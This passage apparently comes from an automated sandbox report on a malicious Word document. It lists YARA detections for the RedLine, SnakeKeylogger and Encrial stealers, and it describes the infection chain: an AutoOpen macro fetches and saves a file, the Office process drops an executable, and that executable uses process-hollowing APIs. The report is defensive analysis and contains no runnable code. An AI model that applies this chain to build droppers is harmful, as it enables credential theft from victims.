Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.Aiymwhpj.PIF.211f67a8.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.Aiymwhpj.PIF.212333d8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.brightness.exe.215f2418.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.brightness.exe.21659f78.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.Aiymwhpj.PIF.211f67a8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000010.00000001.2321191405.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000014.00000002.3410815376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000014.00000001.2400403863.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3410753000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000001.2208904113.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: ENQ-0092025.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, write			Name: AutoOpen

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: ENQ-0092025.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, send			Name: AutoOpen

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to dropped file

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\InProcServer32			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32			Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284824C NtReadVirtualMemory,	8_2_0284824C
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028484BC NtUnmapViewOfSection,	8_2_028484BC
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02848BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	8_2_02848BA8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028479AC NtAllocateVirtualMemory,	8_2_028479AC
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	8_2_0284DE78
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	8_2_0284DFE4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	8_2_0284DF00
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02847CF8 NtWriteVirtualMemory,	8_2_02847CF8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_02848BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	8_2_02848BA6
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028479AA NtAllocateVirtualMemory,	8_2_028479AA
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0284DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	8_2_0284DE24
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029A824C NtReadVirtualMemory,	13_2_029A824C
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029A84BC NtUnmapViewOfSection,	13_2_029A84BC
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029A8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	13_2_029A8BA8
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029A79AC NtAllocateVirtualMemory,	13_2_029A79AC
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029ADE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	13_2_029ADE78
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029ADFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	13_2_029ADFE4
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029ADF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	13_2_029ADF00
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029A7CF8 NtWriteVirtualMemory,	13_2_029A7CF8
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029A8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	13_2_029A8BA6
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029A79AA NtAllocateVirtualMemory,	13_2_029A79AA
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Code function: 13_2_029ADE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	13_2_029ADE24

Source: C:\Windows\SysWOW64\brightness.exe

